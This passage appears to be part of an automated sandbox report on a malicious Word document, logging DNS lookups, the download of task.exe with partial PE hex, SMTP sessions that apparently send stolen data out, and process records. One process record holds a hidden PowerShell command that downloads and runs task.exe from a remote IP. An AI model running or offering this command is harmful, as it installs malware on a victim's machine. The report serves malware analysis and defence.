Nov 25, 2021 18:23:16.389869928 CET  8.8.8.8    192.168.2.22  0x1240    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.389869928 CET  8.8.8.8    192.168.2.22  0x1240    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.436175108 CET  8.8.8.8    192.168.2.22  0x1240    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.436175108 CET  8.8.8.8    192.168.2.22  0x1240    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.436175108 CET  8.8.8.8    192.168.2.22  0x1240    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.436175108 CET  8.8.8.8    192.168.2.22  0x1240    No error (0)  us2.smtp.mailhostbox.com  -      208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.961463928 CET  8.8.8.8    192.168.2.22  0x6f32    No error (0)  us2.smtp.mailhostbox.com  -      208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.961463928 CET  8.8.8.8    192.168.2.22  0x6f32    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.961463928 CET  8.8.8.8    192.168.2.22  0x6f32    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.961463928 CET  8.8.8.8    192.168.2.22  0x6f32    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.999506950 CET  8.8.8.8    192.168.2.22  0x6f32    No error (0)  us2.smtp.mailhostbox.com  -      208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.999506950 CET  8.8.8.8    192.168.2.22  0x6f32    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.999506950 CET  8.8.8.8    192.168.2.22  0x6f32    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.999506950 CET  8.8.8.8    192.168.2.22  0x6f32    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.224  A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

• 173.232.204.89

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 173.232.204.89 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 18:21:19.760103941 CET | 0 | OUT | GET /task.exe HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 173.232.204.89
    Connection: Keep-Alive
Nov 25, 2021 18:21:19.907119036 CET | 1 | IN | HTTP/1.1 200 OK
    Server: nginx/1.19.9
    Date: Thu, 25 Nov 2021 17:21:19 GMT
    Content-Type: application/octet-stream
    Content-Length: 504832
    Last-Modified: Thu, 25 Nov 2021 10:52:42 GMT
    Connection: keep-alive
    ETag: "619f6afa-7b400"
    Accept-Ranges: bytes
                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 
92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 00 02 00 00 11 14 72 01 00 00 70 1a 8d 14 00 00 01 25 16 02 7b 20 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 31 00 00 0a a2 25 17 02 7b 21 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 31 00 00 0a a2 25 18 02 7b 22 00 00 0a 0c 12 02 25 71 08 00 00 1b 8c 08 00 00 1b 2d 04 26 14 2b 0b fe 16 08 00 00 1b 6f 31 00 00 0a a2 25 19 02 7b 23 00 00 0a 0d 12 03 25 71 09 00 00 1b 8c 09 00 00 1b 2d 04 26 14 2b 0b fe 16 09 00
                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELja0 @ @|O H.text `.rsrc@@.reloc@BHet\ { *{!*{"*{#*($} }!}"}#*0su.f,`(%{ { o&,H('{!{!o(,0(){"{"o*,(+{#{#o,++*0b @d )UUZ(%{ o-X )UUZ('{!o.X )UUZ(){"o/X )UUZ(+{#o0X*0rp%{ %q-&+o1%{!%q-&+o1%{"%q-&+o1%{#%q-&+


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 173.232.204.89 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 18:21:28.364023924 CET | 533 | OUT | GET /task.exe HTTP/1.1
    Host: 173.232.204.89
    Connection: Keep-Alive
Nov 25, 2021 18:21:28.511565924 CET | 534 | IN | HTTP/1.1 200 OK
    Server: nginx/1.19.9
    Date: Thu, 25 Nov 2021 17:21:28 GMT
    Content-Type: application/octet-stream
    Content-Length: 504832
    Last-Modified: Thu, 25 Nov 2021 10:52:42 GMT
    Connection: keep-alive
    ETag: "619f6afa-7b400"
    Accept-Ranges: bytes
                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fa 6a 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 07 00 00 08 00 00 00 00 00 00 ce c9 07 00 00 20 00 00 00 e0 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c c9 07 00 4f 00 00 00 00 e0 07 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 a9 07 00 00 20 00 00 00 aa 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 e0 07 00 00 06 00 00 00 ac 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 08 00 00 02 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 07 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 65 00 00 b4 74 00 00 03 00 00 00 93 00 00 06 5c da 00 00 20 ef 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 20 00 00 0a 2a 1e 02 7b 21 00 00 0a 2a 1e 02 7b 22 00 00 0a 2a 1e 02 7b 23 00 00 0a 2a 
92 02 28 24 00 00 0a 02 03 7d 20 00 00 0a 02 04 7d 21 00 00 0a 02 05 7d 22 00 00 0a 02 0e 04 7d 23 00 00 0a 2a 00 00 00 13 30 03 00 73 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 02 06 2e 66 06 2c 60 28 25 00 00 0a 02 7b 20 00 00 0a 06 7b 20 00 00 0a 6f 26 00 00 0a 2c 48 28 27 00 00 0a 02 7b 21 00 00 0a 06 7b 21 00 00 0a 6f 28 00 00 0a 2c 30 28 29 00 00 0a 02 7b 22 00 00 0a 06 7b 22 00 00 0a 6f 2a 00 00 0a 2c 18 28 2b 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 2c 00 00 0a 2b 01 16 2b 01 17 2a 00 13 30 03 00 62 00 00 00 00 00 00 00 20 e4 ab 40 64 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 20 00 00 0a 6f 2d 00 00 0a 58 20 29 55 55 a5 5a 28 27 00 00 0a 02 7b 21 00 00 0a 6f 2e 00 00 0a 58 20 29 55 55 a5 5a 28 29 00 00 0a 02 7b 22 00 00 0a 6f 2f 00 00 0a 58 20 29 55 55 a5 5a 28 2b 00 00 0a 02 7b 23 00 00 0a 6f 30 00 00 0a 58 2a 00 00 13 30 07 00 b2 00 00 00 02 00 00 11 14 72 01 00 00 70 1a 8d 14 00 00 01 25 16 02 7b 20 00 00 0a 0a 12 00 25 71 06 00 00 1b 8c 06 00 00 1b 2d 04 26 14 2b 0b fe 16 06 00 00 1b 6f 31 00 00 0a a2 25 17 02 7b 21 00 00 0a 0b 12 01 25 71 07 00 00 1b 8c 07 00 00 1b 2d 04 26 14 2b 0b fe 16 07 00 00 1b 6f 31 00 00 0a a2 25 18 02 7b 22 00 00 0a 0c 12 02 25 71 08 00 00 1b 8c 08 00 00 1b 2d 04 26 14 2b 0b fe 16 08 00 00 1b 6f 31 00 00 0a a2 25 19 02 7b 23 00 00 0a 0d 12 03 25 71 09 00 00 1b 8c 09 00 00 1b 2d 04 26 14 2b 0b fe 16 09 00
                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELja0 @ @|O H.text `.rsrc@@.reloc@BHet\ { *{!*{"*{#*($} }!}"}#*0su.f,`(%{ { o&,H('{!{!o(,0(){"{"o*,(+{#{#o,++*0b @d )UUZ(%{ o-X )UUZ('{!o.X )UUZ(){"o/X )UUZ(+{#o0X*0rp%{ %q-&+o1%{!%q-&+o1%{"%q-&+o1%{#%q-&+


SMTP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 25, 2021 18:21:56.953448057 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 421 4.4.2 us2.outbound.mailhostbox.com Error: timeout exceeded
Nov 25, 2021 18:21:59.507791996 CET | 587 | 49174 | 208.91.198.143 | 192.168.2.22 | 421 4.4.2 us2.outbound.mailhostbox.com Error: timeout exceeded
Nov 25, 2021 18:22:16.768467903 CET | 587 | 49169 | 208.91.198.143 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:22:16.769277096 CET | 49169 | 587 | 192.168.2.22 | 208.91.198.143 | EHLO 841618
Nov 25, 2021 18:22:16.919429064 CET | 587 | 49169 | 208.91.198.143 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Nov 25, 2021 18:22:16.929383993 CET | 49169 | 587 | 192.168.2.22 | 208.91.198.143 | AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:22:17.080898046 CET | 587 | 49169 | 208.91.198.143 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:22:17.239337921 CET | 587 | 49169 | 208.91.198.143 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:22:17.241938114 CET | 49169 | 587 | 192.168.2.22 | 208.91.198.143 | MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:22:17.394002914 CET | 587 | 49169 | 208.91.198.143 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:22:17.396831989 CET | 49169 | 587 | 192.168.2.22 | 208.91.198.143 | RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:22:17.563546896 CET | 587 | 49169 | 208.91.198.143 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:22:17.565687895 CET | 49169 | 587 | 192.168.2.22 | 208.91.198.143 | DATA
Nov 25, 2021 18:22:17.716183901 CET | 587 | 49169 | 208.91.198.143 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:22:18.775433064 CET | 587 | 49169 | 208.91.198.143 | 192.168.2.22 | 250 2.0.0 Ok: queued as 75FD078216F
Nov 25, 2021 18:22:26.675386906 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:22:26.678370953 CET | 49170 | 587 | 192.168.2.22 | 208.91.198.143 | EHLO 841618
Nov 25, 2021 18:22:26.830585957 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Nov 25, 2021 18:22:26.830857038 CET | 49170 | 587 | 192.168.2.22 | 208.91.198.143 | AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:22:26.983576059 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:22:27.138392925 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:22:27.141244888 CET | 49170 | 587 | 192.168.2.22 | 208.91.198.143 | MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:22:27.294445038 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:22:27.324578047 CET | 49170 | 587 | 192.168.2.22 | 208.91.198.143 | RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:22:27.495106936 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:22:27.495655060 CET | 49170 | 587 | 192.168.2.22 | 208.91.198.143 | DATA
Nov 25, 2021 18:22:27.647941113 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:22:28.720513105 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 250 2.0.0 Ok: queued as 64796782210
Nov 25, 2021 18:22:38.691118956 CET | 49170 | 587 | 192.168.2.22 | 208.91.198.143 | QUIT
Nov 25, 2021 18:22:38.843374014 CET | 587 | 49170 | 208.91.198.143 | 192.168.2.22 | 221 2.0.0 Bye
Nov 25, 2021 18:22:39.279792070 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:22:39.280284882 CET | 49171 | 587 | 192.168.2.22 | 208.91.198.143 | EHLO 841618
Nov 25, 2021 18:22:39.432149887 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Nov 25, 2021 18:22:39.432733059 CET | 49171 | 587 | 192.168.2.22 | 208.91.198.143 | AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:22:39.585161924 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:22:39.739599943 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:22:39.740127087 CET | 49171 | 587 | 192.168.2.22 | 208.91.198.143 | MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:22:39.892735004 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:22:39.893397093 CET | 49171 | 587 | 192.168.2.22 | 208.91.198.143 | RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:22:40.063146114 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:22:40.063385963 CET | 49171 | 587 | 192.168.2.22 | 208.91.198.143 | DATA
Nov 25, 2021 18:22:40.215734005 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:22:41.810641050 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 250 2.0.0 Ok: queued as EF3B278223D
Nov 25, 2021 18:23:07.356256962 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 25, 2021 18:23:07.391012907 CET | 49172 | 587 | 192.168.2.22 | 208.91.198.143 | EHLO 841618
Nov 25, 2021 18:23:07.543054104 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 250-us2.outbound.mailhostbox.com
    250-PIPELINING
    250-SIZE 41648128
    250-VRFY
    250-ETRN
    250-STARTTLS
    250-AUTH PLAIN LOGIN
    250-AUTH=PLAIN LOGIN
    250-ENHANCEDSTATUSCODES
    250-8BITMIME
    250 DSN
Nov 25, 2021 18:23:07.543271065 CET | 49172 | 587 | 192.168.2.22 | 208.91.198.143 | AUTH login ZHViYWlAc2t5Y29tZXguY29t
Nov 25, 2021 18:23:07.695821047 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 334 UGFzc3dvcmQ6
Nov 25, 2021 18:23:07.850228071 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 235 2.7.0 Authentication successful
Nov 25, 2021 18:23:07.850539923 CET | 49172 | 587 | 192.168.2.22 | 208.91.198.143 | MAIL FROM:<dubai@skycomex.com>
Nov 25, 2021 18:23:07.996356010 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 250 2.1.0 Ok
Nov 25, 2021 18:23:07.996689081 CET | 49172 | 587 | 192.168.2.22 | 208.91.198.143 | RCPT TO:<dubai@skycomex.com>
Nov 25, 2021 18:23:08.149750948 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 250 2.1.5 Ok
Nov 25, 2021 18:23:08.149959087 CET | 49172 | 587 | 192.168.2.22 | 208.91.198.143 | DATA
Nov 25, 2021 18:23:08.295223951 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 354 End data with <CR><LF>.<CR><LF>
Nov 25, 2021 18:23:09.657242060 CET | 49172 | 587 | 192.168.2.22 | 208.91.198.143 | .
Nov 25, 2021 18:23:09.974106073 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 250 2.0.0 Ok: queued as 142B2782310
Nov 25, 2021 18:23:15.925235987 CET | 49172 | 587 | 192.168.2.22 | 208.91.198.143 | QUIT
Nov 25, 2021 18:23:16.070209980 CET | 587 | 49172 | 208.91.198.143 | 192.168.2.22 | 221 2.0.0 Bye
Nov 25, 2021 18:23:16.070552111 CET | 49171 | 587 | 192.168.2.22 | 208.91.198.143 | QUIT
Nov 25, 2021 18:23:16.216047049 CET | 587 | 49171 | 208.91.198.143 | 192.168.2.22 | 221 2.0.0 Bye
Nov 25, 2021 18:23:16.747162104 CET | 587 | 49173 | 208.91.199.224 | 192.168.2.22 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Nov 25, 2021 18:23:16.747487068 CET49173587192.168.2.22208.91.199.224EHLO 841618
                                                                                                                      Nov 25, 2021 18:23:16.891685009 CET58749173208.91.199.224192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250 DSN
                                                                                                                      Nov 25, 2021 18:23:16.891992092 CET49173587192.168.2.22208.91.199.224AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                                                                      Nov 25, 2021 18:23:17.036999941 CET58749173208.91.199.224192.168.2.22334 UGFzc3dvcmQ6
                                                                                                                      Nov 25, 2021 18:23:17.183504105 CET58749173208.91.199.224192.168.2.22235 2.7.0 Authentication successful
                                                                                                                      Nov 25, 2021 18:23:17.183830023 CET49173587192.168.2.22208.91.199.224MAIL FROM:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:17.329072952 CET58749173208.91.199.224192.168.2.22250 2.1.0 Ok
                                                                                                                      Nov 25, 2021 18:23:17.329498053 CET49173587192.168.2.22208.91.199.224RCPT TO:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:17.486474991 CET58749173208.91.199.224192.168.2.22250 2.1.5 Ok
                                                                                                                      Nov 25, 2021 18:23:17.486887932 CET49173587192.168.2.22208.91.199.224DATA
                                                                                                                      Nov 25, 2021 18:23:17.631376982 CET58749173208.91.199.224192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                                      Nov 25, 2021 18:23:19.153431892 CET58749173208.91.199.224192.168.2.22250 2.0.0 Ok: queued as 65A7C3A18B7
                                                                                                                      Nov 25, 2021 18:23:22.322994947 CET58749175208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                                                      Nov 25, 2021 18:23:22.323681116 CET49175587192.168.2.22208.91.198.143EHLO 841618
                                                                                                                      Nov 25, 2021 18:23:22.471884966 CET58749175208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                                                      250-PIPELINING
                                                                                                                      250-SIZE 41648128
                                                                                                                      250-VRFY
                                                                                                                      250-ETRN
                                                                                                                      250-STARTTLS
                                                                                                                      250-AUTH PLAIN LOGIN
                                                                                                                      250-AUTH=PLAIN LOGIN
                                                                                                                      250-ENHANCEDSTATUSCODES
                                                                                                                      250-8BITMIME
                                                                                                                      250 DSN
                                                                                                                      Nov 25, 2021 18:23:22.472337961 CET49175587192.168.2.22208.91.198.143AUTH login ZHViYWlAc2t5Y29tZXguY29t
                                                                                                                      Nov 25, 2021 18:23:22.621323109 CET58749175208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                                                      Nov 25, 2021 18:23:22.820713997 CET58749175208.91.198.143192.168.2.22235 2.7.0 Authentication successful
                                                                                                                      Nov 25, 2021 18:23:22.827204943 CET49175587192.168.2.22208.91.198.143MAIL FROM:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:22.976063967 CET58749175208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                                                      Nov 25, 2021 18:23:22.983613014 CET49175587192.168.2.22208.91.198.143RCPT TO:<dubai@skycomex.com>
                                                                                                                      Nov 25, 2021 18:23:23.147027016 CET58749175208.91.198.143192.168.2.22250 2.1.5 Ok
                                                                                                                      Nov 25, 2021 18:23:23.151930094 CET49175587192.168.2.22208.91.198.143DATA
                                                                                                                      Nov 25, 2021 18:23:23.300436974 CET58749175208.91.198.143192.168.2.22354 End data with <CR><LF>.<CR><LF>
                                                                                                                      Nov 25, 2021 18:23:23.304953098 CET49175587192.168.2.22208.91.198.143.
                                                                                                                      Nov 25, 2021 18:23:23.551043034 CET58749175208.91.198.143192.168.2.22250 2.0.0 Ok: queued as 10FB978235B

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 18:21:13
Start date: 25/11/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13f050000
File size: 1423704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:21:20
Start date: 25/11/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'"
Imagebase: 0x13f870000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
